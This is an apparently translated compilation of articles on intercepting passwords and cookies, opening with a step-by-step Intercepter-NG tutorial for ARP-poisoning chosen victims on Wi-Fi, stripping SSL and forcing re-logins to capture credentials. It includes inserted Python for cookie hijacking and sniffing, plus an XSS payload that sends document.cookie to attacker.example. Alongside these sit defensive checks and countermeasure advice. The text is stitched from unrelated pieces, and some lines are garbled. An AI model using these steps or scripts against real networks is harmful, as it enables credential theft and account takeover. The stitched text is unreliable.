On the dangers of open Wi-Fi access points and how passwords can be intercepted over them.
Today we will look at intercepting passwords and cookies over Wi-Fi using the Intercepter-NG program.
The attack relies on sniffing.
Sniffing (from the English verb "sniff") means capturing and analysing network traffic: seeing which sites a user visits and intercepting passwords that are sent in the clear. The same technique has legitimate uses, for example catching malware that sends data out to the Internet.
The method shown here is basic; the program can do considerably more.
The program's official website is sniff.su (copy the link and open it in a new tab); the download is in the "Download" section.
There are versions for Windows, Unix-like systems and Android.
We will use the Windows version, since Windows is the most common system and the program is most developed there.
Your browser or antivirus may flag the program as dangerous; that is expected, since antivirus products always react to hacking tools of this kind.
The program comes as a zip archive: unpack it into a folder and run it, nothing needs to be installed.
The program can carry out various MITM (man-in-the-middle) attacks on Wi-Fi networks.
This article is written purely for informational purposes, to show by example how dangerous open Wi-Fi access points are. Any actions you perform are at your own risk, and remember that intercepting other people's data carries criminal liability.
Working with the Intercepter-NG program
The program is launched via Intercepter-NG.exe.
The interface is in English, but a confident computer user will figure it out.
Below there is a video on setting it up (for those who prefer to watch rather than read).
- Select the desired network at the top if you have several.
- Switch the Ethernet/WiFi type: if you are on Wi-Fi, select the Wi-Fi icon (to the left of the network selection).
- Press the Scan Mode button (the radar icon).
- Right-click in the empty field and choose Smart scan from the context menu.
- All devices connected to the network will appear.
- Select the victim (you can select several while holding Shift), but do not select the router itself; its IP is usually 192.168.1.1.
- With the target selected, right-click and choose Add to nat.
- Go to the Nat tab.
- In Stealth IP it is advisable to change the last octet to an unused address; this hides your real IP.
- Tick SSL Strip and SSL Mitm. Note that SSL Strip does not work against sites the browser already knows as HTTPS-only via HSTS, and SSL Mitm presents a forged certificate that modern browsers warn about.
- Click Settings (the gear icon on the right).
- Tick Resurrection (this allows passwords and cookies from HTTPS sessions to be intercepted, in combination with the SSL Strip / SSL Mitm options above) and Remove Spoof IP/Mac. You can also tick Cookie Killer: it drops the victim's current session, for example on a social network, so the victim has to log in again and we intercept the password. Compare your settings with the picture.
- That completes the setup; close the settings window with the checkmark and you can begin the attack.
- Press the Start/Stop Sniffing button at the top (the triangle), and in the same window click the radiation icon at the bottom, Start/Stop ARP Poison.
- Go to the Password mode tab, right-click in the window and select Show Cookies (this shows the cookies and passwords entered by victims).
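The Start/Stop ARP Poison step above works by making the victim's machine believe that the gateway's IP address belongs to the attacker's MAC address. The victim's side of that, as an added example that is not part of the original article and not Intercepter-NG code: a check of the ARP cache for the two tell-tale signs of poisoning (the gateway entry now points at a different MAC, and one MAC answers for several IPs). It assumes Windows-style `arp -a` output and the gateway address 192.168.1.1 used in the text; the sample table and the recorded gateway MAC are constructed for illustration.

```python
"""Detect ARP poisoning of the gateway entry from the victim's ARP cache.

Added example (not from the article, not Intercepter-NG code).
Assumes Windows `arp -a` output format; the sample below is constructed.
"""
import re
from collections import defaultdict

# Constructed sample: what `arp -a` might print on a victim PC while an
# attacker at 192.168.1.50 is poisoning the gateway entry (192.168.1.1).
SAMPLE_ARP_A = """\
Interface: 192.168.1.23 --- 0xb
  Internet Address      Physical Address      Type
  192.168.1.1           aa-bb-cc-dd-ee-50     dynamic
  192.168.1.50          aa-bb-cc-dd-ee-50     dynamic
  192.168.1.77          00-11-22-33-44-55     dynamic
  192.168.1.255         ff-ff-ff-ff-ff-ff     static
  224.0.0.22            01-00-5e-00-00-16     static
"""

# MAC the gateway is known to have (recorded earlier on a clean network;
# constructed value).
KNOWN_GATEWAY = ("192.168.1.1", "aa-bb-cc-dd-ee-01")

ENTRY_RE = re.compile(
    r"^\s*(\d+\.\d+\.\d+\.\d+)\s+([0-9a-f]{2}(?:-[0-9a-f]{2}){5})\s+(\w+)",
    re.IGNORECASE,
)


def parse_arp_table(text):
    """Return [(ip, mac, type)] for each entry, MACs normalised to lowercase."""
    entries = []
    for line in text.splitlines():
        m = ENTRY_RE.match(line)
        if m:
            ip, mac, kind = m.groups()
            entries.append((ip, mac.lower(), kind.lower()))
    return entries


def is_multicast_or_broadcast(mac):
    # Broadcast and IPv4 multicast MACs legitimately repeat; ignore them.
    return mac == "ff-ff-ff-ff-ff-ff" or mac.startswith("01-00-5e")


def find_arp_anomalies(text, known_gateway):
    """Return human-readable findings (empty list means nothing suspicious).

    1. the gateway IP maps to a MAC other than the recorded one;
    2. one MAC claims several IPs (the attacker answers for the gateway
       while still holding its own address).
    """
    findings = []
    gw_ip, gw_mac = known_gateway
    by_mac = defaultdict(list)
    for ip, mac, kind in parse_arp_table(text):
        if kind != "dynamic" or is_multicast_or_broadcast(mac):
            continue
        by_mac[mac].append(ip)
        if ip == gw_ip and mac != gw_mac:
            findings.append(f"gateway {gw_ip} changed MAC: {gw_mac} -> {mac}")
    for mac, ips in by_mac.items():
        if len(ips) > 1:
            findings.append(f"MAC {mac} claims several IPs: {', '.join(ips)}")
    return findings


if __name__ == "__main__":
    for finding in find_arp_anomalies(SAMPLE_ARP_A, KNOWN_GATEWAY):
        print("ALERT:", finding)
```

On a real machine you would feed the check the output of `arp -a` (or a periodic capture of ARP replies) and compare against a gateway MAC recorded before joining the network; a static ARP entry for the gateway is the corresponding hardening.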
That's it; now we wait for someone to enter a password.
Sometimes the Internet stops working for the victim. Try to access the Internet yourself, and if it does not work, restart the program.
I have noticed that it is not always possible to intercept a password, but in practice it works almost every time.
That's all; we have looked at intercepting passwords and cookies over Wi-Fi.
Take care of yourselves.
The screenshot shows that the cookie contains the string wordpress_logged_in_263d663a02379b7624b1028a58464038=admin. This value is stored in the cookie in clear form and can easily be intercepted with the Achilles utility, although in most cases Achilles will show only the hash of a given entry. Before the request is sent to the server you can try to replace this string with any similar one (in this case there is no point), and the number of attempts is unlimited. Then, by sending the request to the server with the Send button, you can receive the response the server intended for the administrator.
In the previous example direct user ID spoofing can be used. Other parameter names whose values, when replaced, give the attacker additional capabilities include: user (for example USER=JDOE), anything containing an ID string (for example USER=JDOE or SESSIONID=BLAHBLAH), admin (for example ADMIN=TRUE), session (for example SESSION=ACTIVE), cart (for example CART=FULL), and values such as TRUE, FALSE, ACTIVE, INACTIVE. Cookie formats vary greatly between applications, but these tips for finding application flaws through cookies apply to almost all of them.
Client-side countermeasures against cookie extraction
In general, users should be wary of Web sites that use cookies for authentication and for storing sensitive data. Remember also that a Web site that uses cookies for authentication must at least support SSL to encrypt the username and password; without it the data is transmitted in clear text and can be intercepted with the simplest network-monitoring software.
Kookaburra Software has developed a tool to make cookies easier to manage, CookiePal (http://www.kburra.com/cpal.html, see www.kburra.com). The program warns the user when a Web site attempts to set a cookie, and the user can allow or deny it. Similar cookie-blocking functions are available in all browsers today.
Another reason to install Web browser updates regularly is that security flaws in these programs are constantly being found. For example, Bennett Haselton and Jamie McCarthy created a script that, when a link is clicked, retrieves cookies from the client's machine, making the entire contents of the cookies stored there available.
This kind of hack can also be carried out using an IFRAME tag (see "Capture cookies via URL" below).
To keep such things from threatening your personal data, I do this myself and advise everyone to always update software that processes HTML (e-mail clients, media players, browsers and so on).
Many people prefer simply to block cookies, but most Web sites require cookies to be browsed. The conclusion: if a technology appears that makes cookies unnecessary, programmers and administrators will breathe a sigh of relief, but for now cookies remain a tasty morsel for a hacker, since no better alternative exists yet.
Server-side countermeasures
For server security, experts give one simple piece of advice: do not use the cookie mechanism unless absolutely necessary. Particular care must be taken with cookies that remain on the user's system after the session ends.
Of course, cookies can legitimately be used for user authentication on Web servers. If your application does need cookies, configure the mechanism to use a different short-lived key for each session, and do not put information in them that a hacker could use (such as ADMIN=TRUE).
Additionally, cookie encryption can prevent sensitive information from being extracted. Encryption does not solve all security problems with cookies, but it prevents the simplest hacks described above. Note that encryption hides the value but does not by itself stop an intercepted cookie from being replayed; that requires a short lifetime tied to the session. Tampering with the value is detected by an integrity check (a MAC), not by encryption.
Have you ever wondered how some Web sites personalise their visitors? This may take the form of remembering the contents of a shopping cart (if the site sells goods) or of pre-filling the fields of some form. HTTP, the protocol underlying the World Wide Web, has no means of tracking events from one visit to a site to the next, so a special add-on was developed to store such "state". This mechanism, described in RFC 2109 (since superseded by RFC 6265), inserts cookie data into HTTP requests and responses so that Web sites can track their visitors.
Cookies may be kept only for the duration of the session (per-session cookies), held in memory and deleted when the browser closes or after a specified time. Otherwise they are persistent, remaining on the user's hard disk as a text file, usually in the Cookies directory (%windir%\Cookies on Win9x and %userprofile%\Cookies on NT/2000). It is easy to see that after capturing cookies on the network an attacker can impersonate the user of that computer or collect the important information they contain. The following sections show how easy this is.
Cookie interception
The most direct method is to intercept cookies as they are transmitted over the network and then use them when logging in to the corresponding server. Any packet capture utility will do, but one of the best is Laurentiu Nicula's SpyNet/PeepNet. SpyNet consists of two utilities that work together: CaptureNet captures packets and stores them on disk, and PeepNet opens the file and converts it into human-readable form. The following fragment of a session reconstructed by PeepNet shows a cookie serving to authenticate the user and control access to the pages viewed (names have been changed to preserve anonymity).
GET http://www.victim.net/images/logo.gif HTTP/1.0
Accept: */*
Referer: http://www.victim.net/
Host: www.victim.net
Cookie: jrunsessionid=96114024278141622; cuid=TORPM!ZXTFRLRlpWTVFISEblahblah
The example shows a cookie fragment in an HTTP request sent to the server. The key field is cuid=, a unique identifier used to authenticate the user to www.victim.net. Suppose the attacker then visits victim.net and receives his own identifier and cookie (assuming the site writes the cookie to disk rather than keeping it only in memory). He can then open his own cookie and replace the cuid= value with the one from the captured packet; when he connects to victim.net he will be treated as the user whose cookie was intercepted.
PeepNet's ability to replay an entire session or a fragment of it makes this kind of attack much easier. With the Go get it! button you can re-fetch the pages a user viewed, using the cookie data previously captured by CaptureNet. The PeepNet dialog then shows, for example, someone's completed orders, retrieved by authenticating with the intercepted cookie. Note the frame in the lower right corner of the session data dialog and the line after Cookie:, which is the cookie data used for authentication.
It is a pretty neat trick. CaptureNet can also provide a complete decoded record of the traffic, almost matching professional-grade tools such as Network Associates' Sniffer Pro. And SpyNet is even better in one respect: it is free.
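The substitution the text describes, done by hand on the captured request: parse the intercepted HTTP request, lift the cuid= value out of its Cookie header, drop it into the attacker's own cookie jar for victim.net and build the request that replays it. This is an added example, not from the original text and not PeepNet/SpyNet code. It reconstructs the captured request printed above as bytes; the attacker's own cookie value and the page path requested are constructed for illustration.

```python
"""Cookie hijack by substituting the captured authentication field.

Added example (not from the text, not PeepNet/SpyNet code). The captured
request is the one shown above; ATTACKER_COOKIE and the replayed path
are constructed.
"""
from email.parser import BytesParser

# The request reconstructed by PeepNet in the text, as it crossed the wire.
CAPTURED_REQUEST = (
    b"GET http://www.victim.net/images/logo.gif HTTP/1.0\r\n"
    b"Accept: */*\r\n"
    b"Referer: http://www.victim.net/\r\n"
    b"Host: www.victim.net\r\n"
    b"Cookie: jrunsessionid=96114024278141622; cuid=TORPM!ZXTFRLRlpWTVFISEblahblah\r\n"
    b"\r\n"
)

# Constructed: the cookie victim.net handed to the attacker's own browser.
ATTACKER_COOKIE = "jrunsessionid=11111111111111111; cuid=ATTACKERSOWNIDxxxxxxxx"


def parse_request(raw):
    """Split a raw HTTP/1.x request into (method, target, version, headers)."""
    request_line, _, rest = raw.partition(b"\r\n")
    method, target, version = request_line.decode("ascii").split(" ", 2)
    headers = BytesParser().parsebytes(rest)  # RFC 822 style header block
    return method, target, version, headers


def parse_cookie_header(value):
    """'a=1; b=2' -> {'a': '1', 'b': '2'}, order preserved; junk skipped."""
    jar = {}
    for part in value.split(";"):
        name, sep, val = part.strip().partition("=")
        if sep:
            jar[name] = val
    return jar


def format_cookie_header(jar):
    return "; ".join(f"{name}={val}" for name, val in jar.items())


def hijack_cookie(captured_raw, own_cookie, auth_field="cuid"):
    """Return the attacker's cookie with auth_field replaced by the captured
    one, or None when the capture carries no such field (nothing to steal).
    """
    _, _, _, headers = parse_request(captured_raw)
    captured = parse_cookie_header(headers.get("Cookie", ""))
    if auth_field not in captured:
        return None
    own = parse_cookie_header(own_cookie)
    own[auth_field] = captured[auth_field]
    return format_cookie_header(own)


def build_replay_request(path, host, cookie):
    """The attacker's request for a page, authenticated with the hijacked cookie."""
    return (
        f"GET {path} HTTP/1.0\r\n"
        f"Host: {host}\r\n"
        f"Cookie: {cookie}\r\n"
        "\r\n"
    ).encode("ascii")


if __name__ == "__main__":
    stolen = hijack_cookie(CAPTURED_REQUEST, ATTACKER_COOKIE)
    print(build_replay_request("/account/orders", "www.victim.net", stolen).decode())
```

The whole attack rests on the Cookie header being readable on the wire: the captured request went to http://, not https://, so the identifier travelled in clear text and nothing ties it to the original client.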
Countermeasures
You should be wary of sites that use cookies for authentication and for storing sensitive identification information. One tool that can help is Kookaburra Software's Cookie Pal (http://www.kburra.com/cpal.html), which can be configured to warn the user when a Web site tries to use cookies, so you can look behind the scenes and decide whether to allow it. Internet Explorer has built-in cookie controls: open the Internet Options applet in Control Panel, go to the Security tab, select the Internet zone, choose Custom Level, and set both persistent and per-session cookies to Prompt. In Netscape, use Edit › Preferences › Advanced and select Warn me before accepting a cookie or Disable cookies (Fig. 16.3). When accepting a cookie, check whether it is written to disk and whether the Web site collects information about users.
When visiting a site that uses cookies for authentication, make sure the username and password you initially provide are at least SSL-encrypted; then they will at least not appear as plain text in PeepNet's window. Note that encrypting only the login is not enough: if the following requests go over plain HTTP, as in the captured request above, the session cookie itself is still sent in the clear.
The authors would prefer to avoid cookies entirely if so many frequently visited Web sites did not require them. For example, Microsoft's popular Hotmail service requires cookies to sign in. Because this service uses several different servers during authentication, adding them to the Trusted Sites zone is not easy (the process is described in the section "Using Security Zones Wisely: A Common Solution to the ActiveX Control Problem"); the wildcard *.hotmail.com helps here. Cookies are not a perfect solution to HTTP's lack of state, but the alternatives seem worse (for example, adding an identifier to the URL, where it may be stored by proxy servers). Until a better idea comes along, your only option is to control your cookies using the methods listed above.
Capture cookies via URL
Imagine something frightening: Internet Explorer users click specially crafted hyperlinks and become potential victims, risking having their cookies intercepted. Bennett Haselton and Jamie McCarthy of Peacefire, a youth organisation that advocates freedom of communication on the Internet, published a script that does exactly this. The script retrieves cookies from the client computer when its user clicks a link on the page, making the contents of the cookies available to the Web site's operators.
This can be exploited for nefarious purposes by embedding IFRAME tags in the HTML of a Web page, an HTML e-mail or a newsgroup post. The following example, provided by security consultant Richard M. Smith, demonstrates the use of IFRAME tags with the utility developed by Peacefire.
One could craft an insidious e-mail message that grabs cookies from the user's hard drive and sends them to the operators of peacefire.org, by placing a link to that site in the message many times as shown in the example. Although the Peacefire people seem nice enough, nobody would be happy about them getting hold of confidential data.
Countermeasures
Install the patch described at http://www.microsoft.com/technet/security/bulletin/ms00-033.asp. You can also use Cookie Pal or the built-in Internet Explorer settings described above.
Have you noticed that when you return to a site you have already visited, it recognises you and opens with the settings you applied last time? Quite often, yes. This happens thanks to cookies, which store information about the visitor such as a login name, session ID (on badly designed sites even the password) and other variables needed to identify the visitor and display the page according to the preferences chosen on the previous visit. The WebCookiesSniffer program shows the user the cookies, and their contents, of the sites being viewed in the browser.
Viewing cookies
You open a website and WebCookiesSniffer captures its cookies in real time. The utility adds every captured cookie to a table holding the host, the request path, the total length of the cookie, the number of variables in it, and the cookie itself with variable names and values. WebCookiesSniffer can save the collected cookie information to a text file and can generate an HTML report for all or selected cookies. For the program to work you must install the WinPcap driver (included in the archive with WebCookiesSniffer). To switch the program's language to Russian, copy the file WebCookiesSniffer_lng.ini (also in the archive) into the utility's directory.
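What a cookie sniffer of this kind does with captured traffic, as an added example that is not WebCookiesSniffer's own code: scan the reassembled TCP payload of each connection for HTTP requests and tabulate host, request path, cookie length, number of variables and the cookie itself, the same columns the table above lists. Instead of a live WinPcap capture it works on constructed payloads embedded below; the hosts, paths and cookie values are made up. The third payload is the start of a TLS handshake, which shows the limit of the technique: under HTTPS no Cookie header is ever visible.

```python
"""Minimal cookie sniffer over captured TCP payloads.

Added example (not WebCookiesSniffer code). The connections below are
constructed stand-ins for what a capture driver would hand over.
"""
import re
from dataclasses import dataclass

REQUEST_LINE = re.compile(rb"^(GET|POST|HEAD|PUT|DELETE) (\S+) HTTP/1\.[01]\r\n", re.M)

# Constructed payloads of three TCP connections. The third is the beginning
# of a TLS ClientHello: with HTTPS the sniffer sees no Cookie header at all.
CONNECTIONS = [
    (b"GET /index.php HTTP/1.1\r\nHost: forum.example\r\n"
     b"Cookie: PHPSESSID=4f3a9c; lang=ru\r\n\r\n"
     b"GET /profile?id=7 HTTP/1.1\r\nHost: forum.example\r\n"
     b"Cookie: PHPSESSID=4f3a9c; lang=ru; theme=dark\r\n\r\n"),
    (b"POST /login HTTP/1.1\r\nHost: shop.example\r\nContent-Length: 0\r\n\r\n"
     b"GET /cart HTTP/1.1\r\nHost: shop.example\r\nCookie: cart=FULL\r\n\r\n"),
    b"\x16\x03\x01\x00\xc4\x01\x00\x00\xc0\x03\x03" + b"\x00" * 32,
]


@dataclass
class CookieRow:
    host: str
    path: str
    length: int      # total length of the Cookie header value
    variables: int   # number of name=value pairs
    cookie: str


def split_requests(payload):
    """Yield (path, header_block) for every HTTP request found in a payload."""
    matches = list(REQUEST_LINE.finditer(payload))
    for i, m in enumerate(matches):
        end = matches[i + 1].start() if i + 1 < len(matches) else len(payload)
        block = payload[m.end():end].split(b"\r\n\r\n", 1)[0]
        yield m.group(2).decode("latin-1"), block.decode("latin-1")


def header(block, name):
    """Case-insensitive lookup of one header in a CRLF-separated block."""
    for line in block.split("\r\n"):
        key, _, value = line.partition(":")
        if key.strip().lower() == name.lower():
            return value.strip()
    return None


def sniff_cookies(connections):
    """Build the table rows for every request that carries a Cookie header."""
    rows = []
    for payload in connections:
        for path, block in split_requests(payload):
            cookie = header(block, "Cookie")
            if cookie is None:
                continue
            pairs = [p for p in cookie.split(";") if "=" in p]
            rows.append(CookieRow(header(block, "Host") or "?", path,
                                  len(cookie), len(pairs), cookie))
    return rows


def report(rows):
    return "\n".join(f"{r.host:14} {r.path:16} {r.length:4} {r.variables:2}  {r.cookie}"
                     for r in rows)


if __name__ == "__main__":
    print(report(sniff_cookies(CONNECTIONS)))
```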
Screenshots of the WebCookiesSniffer program
Cookies are small pieces of information that a website has the browser store as text on the user's computer. They may contain authentication data (login/password, ID, phone number, e-mail address), user settings and access status, and are kept in the browser profile.
Cookie hacking is the theft (or "hijacking") of a visitor's session with a web resource. Private information becomes available not only to the sender and the recipient but also to a third party, the one who carried out the interception.
Cookie Hacking Tools and Techniques
Computer thieves, like their real-world colleagues, have not only skill, dexterity and knowledge but also their own tools, a kind of arsenal of lock picks and probes. Let us look at the most popular tricks hackers use to extract cookies from Internet users.
Sniffers
Special programs for monitoring and analysing network traffic. The name comes from the English verb "sniff", because they literally sniff out the packets transmitted between hosts.
Attackers use a sniffer to intercept session data, messages and other confidential information. Their main targets are unprotected networks where cookies are sent in plain HTTP sessions, that is, effectively unencrypted. (Public Wi-Fi is the most vulnerable in this respect.)
To place a sniffer in the path between the user's host and the web server, the following methods are used:
- listening on network devices (hubs, switches);
- tapping and copying traffic (a network tap or port mirroring);
- inserting the sniffer inline into a break in the link;
- attacks that redirect the victim's traffic to the sniffer (MAC spoofing, IP spoofing, and the ARP poisoning shown above).
XSS
The abbreviation XSS stands for Cross-Site Scripting. It is used to attack websites in order to steal user data.
The principle of XSS is as follows:
- the attacker inserts malicious code (a disguised script) into a page of a website or forum, or into a message (for example in social-network correspondence);
- the victim opens the infected page and triggers the code (clicks, follows a link and so on), which then runs in the victim's browser;
- the script extracts the user's confidential data from the browser (in particular cookies) and sends it to the attacker's web server.
To plant an XSS payload, hackers exploit all sorts of flaws in web servers, online services and browsers.
XSS vulnerabilities fall into two types:
- Passive (reflected). The attack is triggered by a request that carries the script, typically injected into a form field such as the site's search bar. Resources that do not filter HTML tags in incoming data are the most susceptible.
- Active (stored). The malicious code is stored on the server itself and runs in the browser of every visitor. Scammers use it widely in blogs, chats and news feeds.
Hackers carefully camouflage their XSS scripts so that the victim suspects nothing: they change the file extension, pass the code off as an image, entice the victim to follow a link, or attract them with interesting content. As a result the user, unable to control his own curiosity, sends his session cookies (that is, his authenticated session) to the author of the XSS script with a single mouse click.
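The passive (reflected) variant just described, with the two server-side settings that decide whether it can steal cookies at all: whether the reflected input is HTML-escaped before it lands in the page, and whether the session cookie is set with HttpOnly (a cookie flagged HttpOnly is not readable by document.cookie, so a script running in the page cannot exfiltrate it). This is an added example, not from the original article; the page template, the exfiltration payload with its attacker.example collector and the Set-Cookie headers are constructed.

```python
"""Reflected XSS that exfiltrates document.cookie, beside the fixes.

Added example (not from the article). The template, payload, collector
host and Set-Cookie headers are constructed for illustration.
"""
import html
import re

# Constructed payload of the kind described in the text: it ships
# document.cookie to the attacker's collector ("online sniffer").
PAYLOAD = '<script>new Image().src="http://attacker.example/c?"+document.cookie</script>'


def render_search_vulnerable(query):
    """Reflects the search term into the page unfiltered (passive XSS)."""
    return f"<h1>Results for: {query}</h1>"


def render_search_hardened(query):
    """Same page, but the term is HTML-escaped before it enters the markup."""
    return f"<h1>Results for: {html.escape(query, quote=True)}</h1>"


def contains_script(page):
    """Crude check: does the rendered HTML contain a live <script> element?"""
    return re.search(r"<script\b", page, re.I) is not None


def audit_set_cookie(headers):
    """For each Set-Cookie header, list the protections that are missing.

    HttpOnly  keeps the cookie out of reach of document.cookie (XSS theft)
    Secure    never sends it over plain HTTP (sniffers on open Wi-Fi)
    SameSite  limits sending on cross-site requests
    Returns {cookie_name: [missing attributes]}.
    """
    wanted = ("HttpOnly", "Secure", "SameSite")
    result = {}
    for h in headers:
        name_value, *attrs = [p.strip() for p in h.split(";")]
        name = name_value.split("=", 1)[0]
        present = {a.split("=", 1)[0].lower() for a in attrs}
        result[name] = [w for w in wanted if w.lower() not in present]
    return result


# Constructed responses: the session cookie set the weak way and the hardened way.
WEAK_HEADERS = ["PHPSESSID=4f3a9c; Path=/"]
HARDENED_HEADERS = ["PHPSESSID=4f3a9c; Path=/; Secure; HttpOnly; SameSite=Lax"]


if __name__ == "__main__":
    print(render_search_vulnerable(PAYLOAD))
    print(render_search_hardened(PAYLOAD))
    print(audit_set_cookie(WEAK_HEADERS))
    print(audit_set_cookie(HARDENED_HEADERS))
```

Escaping stops the script from executing; HttpOnly limits the damage if some other injection point is missed. The same audit applies to the "physical access" trick further down: cookies marked HttpOnly do not show up when a script is typed into the address bar either.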
Cookie substitution
Normally cookies are saved and sent back to the web server they came from unchanged, with the same values, strings and other data. Deliberately modifying their parameters is called cookie substitution: the attacker presents the server with what he would like to be true. For example, when paying in an online store, the amount stored in a cookie is changed downwards, and the purchase is "saved on".
Session cookies stolen from someone else's social-network account are inserted into another session on another PC. The holder of the stolen cookies then has full access to the victim's account (messages, content, page settings) for as long as the victim's session remains valid.
Cookies are "edited" using:
- the "Manage cookies..." function in the Opera browser;
- the Cookies Manager and Advanced Cookie Manager add-ons for Firefox;
- the IECookiesView utility (Internet Explorer only);
- a text editor such as AkelPad, NotePad or Windows Notepad.
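The server-side answer to cookie substitution, covering both the tampering just described (a lowered payment amount, a session taken over on another PC) and the earlier advice in the server-side countermeasures section and the ADMIN=TRUE / USER=JDOE examples: give each session a random identifier, keep the cookie short-lived, and attach an integrity tag so an edited or expired cookie is rejected. This is an added example, not from the original article; the cookie layout (payload.expiry.tag), the signing key and the sample cookies are constructed. Note that encryption alone would hide the value but not detect a change; the HMAC tag is what catches tampering.

```python
"""Signed, short-lived session cookie that rejects substitution and replay.

Added example (not from the article). Layout, key and samples are constructed.
"""
import base64
import hashlib
import hmac
import json
import secrets
import time

SERVER_SECRET = secrets.token_bytes(32)   # server-side only, never in the cookie
SESSION_TTL = 15 * 60                     # seconds: short-lived, as the text advises


def _b64(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def _unb64(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def issue_cookie(payload, secret=None, now=None, ttl=SESSION_TTL):
    """Build the value for `Set-Cookie: session=<value>`.

    payload: a dict holding a random session id and opaque data only; never
    authorisation flags such as admin=True (look those up server-side).
    """
    secret = SERVER_SECRET if secret is None else secret
    now = int(time.time()) if now is None else now
    body = json.dumps(payload, separators=(",", ":"), sort_keys=True).encode()
    msg = _b64(body) + "." + str(now + ttl)
    tag = hmac.new(secret, msg.encode(), hashlib.sha256).digest()
    return msg + "." + _b64(tag)


def verify_cookie(value, secret=None, now=None):
    """Return the payload dict, or None if the cookie is expired, edited or malformed."""
    secret = SERVER_SECRET if secret is None else secret
    now = int(time.time()) if now is None else now
    try:
        body_b64, expiry, tag_b64 = value.split(".")
        msg = body_b64 + "." + expiry
        expected = hmac.new(secret, msg.encode(), hashlib.sha256).digest()
        if not hmac.compare_digest(expected, _unb64(tag_b64)):
            return None                      # payload or expiry was edited
        if now >= int(expiry):
            return None                      # replay of an old cookie
        return json.loads(_unb64(body_b64))
    except (ValueError, TypeError):
        return None


def tamper(value, new_payload):
    """What the attacker does with a text editor: swap the payload, keep expiry and tag."""
    _, expiry, tag = value.split(".")
    body = json.dumps(new_payload, separators=(",", ":"), sort_keys=True).encode()
    return _b64(body) + "." + expiry + "." + tag


if __name__ == "__main__":
    key = secrets.token_bytes(32)
    cookie = issue_cookie({"sid": secrets.token_hex(16), "cart_total": 250}, key, now=1000)
    print(verify_cookie(cookie, key, now=1500))                                      # accepted
    print(verify_cookie(tamper(cookie, {"sid": "x", "cart_total": 1}), key, now=1500))  # None
    print(verify_cookie(cookie, key, now=1000 + SESSION_TTL))                        # None
```

The check is only as good as the transport: a signed cookie captured on open Wi-Fi is still valid until it expires, which is why the short lifetime and the Secure flag matter as much as the signature.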
Physical access to data
A very simple scheme with a few steps. It works only if the victim's computer is left unattended with an open session, for example on VKontakte (and for a long time!):
- A JavaScript function that displays all saved cookies is entered in the browser's address bar.
- After pressing Enter they all appear on the page (cookies marked HttpOnly are not shown to such a script).
- The cookies are copied, saved to a file and transferred to a flash drive.
- On another PC the cookies are substituted into a new session.
- Access to the victim's account is obtained.
As a rule, hackers use the above tools (and others) both in combination (since many web resources are quite well protected) and separately (when users are overly naive).
XSS + sniffer
- An XSS script is created that points at the address of an online sniffer (either home-made or a particular service).
- The malicious code is saved with a .img extension (an image format).
- The file is uploaded to a website page, a chat or a personal message, wherever the attack will be carried out.
- The user's attention is drawn to the prepared "trap" (this is where social engineering comes in).
- If the trap is triggered, the cookies from the victim's browser are captured by the sniffer.
- The attacker opens the sniffer logs and retrieves the stolen cookies.
- Then the cookies are substituted, using the tools above, to obtain the account owner's rights.
Protecting cookies from hacking
- Use an encrypted connection (with the appropriate protocols and security methods).
- Do not respond to dubious links, pictures or tempting offers to try "new free software", especially from strangers.
- Use only trusted web resources.
- End an authenticated session with the "Logout" button (not just by closing the tab!), especially if you logged in not from your own computer but, for example, from a PC in an Internet cafe.
- Do not use the browser's "Save password" feature. Stored credentials significantly increase the risk of theft; spend the few seconds it takes to enter your login and password at the start of each session.
- After web surfing (social networks, forums, chats, websites) delete the saved cookies and clear the browser cache.
- Update your browsers and antivirus software regularly.
- Use browser extensions that protect against XSS (for example NoScript for Firefox and Google Chrome).
- Periodically in accounts.
And most importantly, stay vigilant and attentive while relaxing or working on the Internet!